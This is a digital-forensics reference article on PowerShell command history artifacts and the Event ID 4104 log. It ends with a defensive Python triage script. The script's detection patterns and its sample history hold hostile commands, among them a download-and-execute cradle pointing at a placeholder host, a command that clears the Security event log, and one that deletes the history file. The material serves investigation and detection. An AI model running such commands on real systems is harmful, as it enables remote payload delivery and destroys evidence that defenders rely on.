PowerShell History
PowerShell is the preferred weapon platform of modern adversaries and red teams because it provides deep system access through a framework that is natively signed by Microsoft. The command history files it leaves behind are among the most actionable artifacts an investigator will ever parse. A single history file can expose an attacker's entire intrusion playbook — every download, every lateral movement command and every attempt to cover their tracks.
Imagine that every time you used a calculator app, it secretly wrote every calculation you typed into a notepad stored in a specific folder. PowerShell does exactly this: every command an attacker types into an interactive PowerShell session is automatically saved to a plain text file. Investigators find this file and read the entire conversation between the attacker and the machine line by line.
General
PowerShell maintains its command history through the PSReadLine module, which is enabled by default in all modern installations. The module appends each command typed in an interactive console session to a plain text file called ConsoleHost_history.txt located at %APPDATA%\Microsoft\Windows\PowerShell\PSReadLine\ (one file per user profile, so collect it from every profile on the host). The key advantage for investigators is that this file is intentionally readable and requires no special parsing: it is a sequential log of commands typed in interactive sessions. Two caveats follow from how it is written. It records only interactive console input, so a script launched non-interactively (for example with -File) or commands run in the ISE leave nothing here, and an empty or missing file is not evidence that PowerShell was not used. It also carries no per-command timestamps. In addition to this file, advanced logging via Script Block Logging and Transcription records PowerShell execution details, with Script Block Logging writing the decoded content of every script block into the Windows Event Log under the Microsoft-Windows-PowerShell/Operational channel as Event ID 4104, capturing even obfuscated and encoded commands after the engine has decoded them.
Traces
PowerShell leaves evidence in two primary locations. Here are the top artifacts and data points we prioritize:
- Command Text: The verbatim commands typed by the user or injected by a script, stored in ConsoleHost_history.txt.
- Script Block Content: The decoded, runtime-deobfuscated content of every script block recorded by Event ID 4104.
- Execution Timestamps: The history file holds no per-command timestamps, so its file modification date only dates the last command written; the event log timestamps supply the per-event timeline of activity.
- Download Cradles: Incriminating one-liners like Invoke-WebRequest or IEX (New-Object Net.WebClient).DownloadString() that prove remote payload delivery.
- Module Loading: Names of every imported module or snap-in used during the session.
- and more.
Forensic Value
We analyze PowerShell artifacts to expose attacker tradecraft at its most technical level:
- Payload Delivery: Finding download cradle commands that fetched a remote malware stage. Match these with the PowerShell event log (Event ID 4104) to recover the decoded script blocks.
- Living-off-the-Land: Identifying the use of built-in PowerShell commands to perform reconnaissance or dump credentials.
- Persistence Mechanisms: Uncovering scheduled tasks or registry run-keys created via PowerShell to maintain attacker access.
- Anti-Forensics Detection: Identifying commands used to delete event logs, clear the history file or uninstall security software.
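As an added example that is not part of this article, the following Python script triages a collected ConsoleHost_history.txt and tags each command with the artifact classes listed under Traces and Forensic Value above (download cradles, encoded commands, module loading, persistence, anti-forensics). The sample history content and the regex rule set are constructed for illustration; substitute your own signatures for real casework.

```python
import os
import re
from datetime import datetime, timezone
# Defender-side heuristics for the artifact classes listed above (illustrative, not a vendor rule set)
PATTERNS = {
    "download_cradle": re.compile(r"invoke-webrequest|\biwr\b|net\.webclient|downloadstring|"
                                  r"downloadfile|invoke-restmethod|start-bitstransfer", re.I),
    "encoded_command": re.compile(r"-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "module_load": re.compile(r"^\s*(import-module|add-pssnapin)\b", re.I | re.M),
    "persistence": re.compile(r"register-scheduledtask|schtasks|currentversion\\run", re.I),
    "anti_forensics": re.compile(r"clear-eventlog|wevtutil\s+cl\b|clear-history|"
                                 r"remove-item[^\n]*consolehost_history|historysavestyle\s+savenothing", re.I),
}

# Constructed sample in the on-disk format: one command per line; a multi-line command is stored as several lines whose non-final lines end in a backtick
SAMPLE = """Get-Process
Import-Module ActiveDirectory
IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage.ps1')
Get-ChildItem C:\\Users | `
  Select-Object Name
wevtutil cl Security
Remove-Item $env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt
"""

def parse_history(text):
    """Rebuild logical commands from raw file text, re-joining backtick continuations."""
    commands, buf = [], []
    for line in text.splitlines():
        buf.append(line[:-1] if line.endswith("`") else line)
        if not line.endswith("`"):        # last (or only) line of a command: flush it
            commands.append("\n".join(buf).strip())
            buf = []
    if buf:                               # file ended in the middle of a continuation
        commands.append("\n".join(buf).strip())
    return [c for c in commands if c]     # drop blank entries

def triage(commands):
    """Return (1-based position, command, matched categories) for every flagged command."""
    hits = []
    for pos, cmd in enumerate(commands, 1):
        cats = [name for name, rx in PATTERNS.items() if rx.search(cmd)]
        if cats:
            hits.append((pos, cmd, cats))
    return hits

def triage_file(path):
    """Triage a collected history file; its mtime only bounds the LAST command written."""
    mtime = datetime.fromtimestamp(os.path.getmtime(path), tz=timezone.utc).isoformat()
    with open(path, encoding="utf-8", errors="replace") as fh:   # PSReadLine writes UTF-8
        return {"file": path, "last_modified_utc": mtime, "hits": triage(parse_history(fh.read()))}
```

Run triage_file() against each profile's ConsoleHost_history.txt; the position field preserves the order in which the commands were typed, which is the only sequencing the file provides.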
For more info, see the related article: PowerShell EventLogs